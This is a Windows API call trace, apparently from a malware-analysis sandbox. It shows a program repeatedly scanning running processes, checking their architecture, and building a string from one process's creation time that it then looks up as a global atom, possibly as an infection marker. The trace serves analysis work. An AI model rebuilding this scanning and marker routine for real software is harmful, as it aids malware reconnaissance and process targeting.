	[0091.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.400] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.400] CloseHandle (hObject=0x20c) returned 1
	[0091.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.400] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.400] CloseHandle (hObject=0x20c) returned 1
	[0091.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.401] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.401] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.401] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.401] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.401] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.402] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.402] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.402] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.402] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.402] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.403] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.403] CloseHandle (hObject=0x20c) returned 1
	[0091.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.403] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.403] CloseHandle (hObject=0x20c) returned 1
	[0091.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.474] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.474] CloseHandle (hObject=0x20c) returned 1
	[0091.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.474] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.475] CloseHandle (hObject=0x20c) returned 1
	[0091.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.475] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.475] CloseHandle (hObject=0x20c) returned 1
	[0091.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.475] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.475] CloseHandle (hObject=0x20c) returned 1
	[0091.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.475] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.475] CloseHandle (hObject=0x20c) returned 1
	[0091.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.475] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.475] CloseHandle (hObject=0x20c) returned 1
	[0091.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.476] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.476] CloseHandle (hObject=0x20c) returned 1
	[0091.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.476] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.476] CloseHandle (hObject=0x20c) returned 1
	[0091.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.476] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.476] CloseHandle (hObject=0x20c) returned 1
	[0091.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.476] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.476] CloseHandle (hObject=0x20c) returned 1
	[0091.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.476] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.477] CloseHandle (hObject=0x20c) returned 1
	[0091.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.477] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.477] CloseHandle (hObject=0x20c) returned 1
	[0091.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.477] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.477] CloseHandle (hObject=0x20c) returned 1
	[0091.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.477] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.477] CloseHandle (hObject=0x20c) returned 1
	[0091.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.477] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.477] CloseHandle (hObject=0x20c) returned 1
	[0091.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.477] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.477] CloseHandle (hObject=0x20c) returned 1
	[0091.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.478] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.478] CloseHandle (hObject=0x20c) returned 1
	[0091.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.478] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.478] CloseHandle (hObject=0x20c) returned 1
	[0091.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.478] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.478] CloseHandle (hObject=0x20c) returned 1
	[0091.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.478] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.478] CloseHandle (hObject=0x20c) returned 1
	[0091.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.478] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.478] CloseHandle (hObject=0x20c) returned 1
	[0091.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.479] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.479] CloseHandle (hObject=0x20c) returned 1
	[0091.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.479] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.479] CloseHandle (hObject=0x20c) returned 1
	[0091.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.479] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.479] CloseHandle (hObject=0x20c) returned 1
	[0091.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.479] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.479] CloseHandle (hObject=0x20c) returned 1
	[0091.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.479] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.479] CloseHandle (hObject=0x20c) returned 1
	[0091.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.480] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.480] CloseHandle (hObject=0x20c) returned 1
	[0091.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.480] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.480] CloseHandle (hObject=0x20c) returned 1
	[0091.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.480] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.480] CloseHandle (hObject=0x20c) returned 1
	[0091.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.480] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.480] CloseHandle (hObject=0x20c) returned 1
	[0091.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.480] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.480] CloseHandle (hObject=0x20c) returned 1
	[0091.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.481] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.481] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.481] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.481] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.481] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.482] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.482] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.482] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.482] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.482] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.482] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.482] CloseHandle (hObject=0x20c) returned 1
	[0091.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.483] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.483] CloseHandle (hObject=0x20c) returned 1
	[0091.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.555] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.556] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.556] CloseHandle (hObject=0x20c) returned 1
	[0091.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.556] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.556] CloseHandle (hObject=0x20c) returned 1
	[0091.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.556] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.557] CloseHandle (hObject=0x20c) returned 1
	[0091.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.557] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.557] CloseHandle (hObject=0x20c) returned 1
	[0091.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.557] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.557] CloseHandle (hObject=0x20c) returned 1
	[0091.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.557] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.557] CloseHandle (hObject=0x20c) returned 1
	[0091.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.557] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.557] CloseHandle (hObject=0x20c) returned 1
	[0091.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.557] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.558] CloseHandle (hObject=0x20c) returned 1
	[0091.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.558] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.558] CloseHandle (hObject=0x20c) returned 1
	[0091.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.558] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.558] CloseHandle (hObject=0x20c) returned 1
	[0091.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.558] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.558] CloseHandle (hObject=0x20c) returned 1
	[0091.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.558] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.558] CloseHandle (hObject=0x20c) returned 1
	[0091.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.559] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.559] CloseHandle (hObject=0x20c) returned 1
	[0091.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.559] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.559] CloseHandle (hObject=0x20c) returned 1
	[0091.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.559] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.559] CloseHandle (hObject=0x20c) returned 1
	[0091.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.559] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.559] CloseHandle (hObject=0x20c) returned 1
	[0091.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.559] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.559] CloseHandle (hObject=0x20c) returned 1
	[0091.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.559] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.559] CloseHandle (hObject=0x20c) returned 1
	[0091.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.560] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.560] CloseHandle (hObject=0x20c) returned 1
	[0091.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.560] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.560] CloseHandle (hObject=0x20c) returned 1
	[0091.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.560] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.560] CloseHandle (hObject=0x20c) returned 1
	[0091.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.560] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.560] CloseHandle (hObject=0x20c) returned 1
	[0091.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.560] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.560] CloseHandle (hObject=0x20c) returned 1
	[0091.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.560] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.560] CloseHandle (hObject=0x20c) returned 1
	[0091.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.561] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.561] CloseHandle (hObject=0x20c) returned 1
	[0091.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.561] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.561] CloseHandle (hObject=0x20c) returned 1
	[0091.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.561] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.561] CloseHandle (hObject=0x20c) returned 1
	[0091.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.561] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.561] CloseHandle (hObject=0x20c) returned 1
	[0091.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.561] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.561] CloseHandle (hObject=0x20c) returned 1
	[0091.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.561] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.561] CloseHandle (hObject=0x20c) returned 1
	[0091.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.562] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.562] CloseHandle (hObject=0x20c) returned 1
	[0091.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.562] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.562] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.562] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.562] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.562] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.563] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.563] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.563] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.563] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.563] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
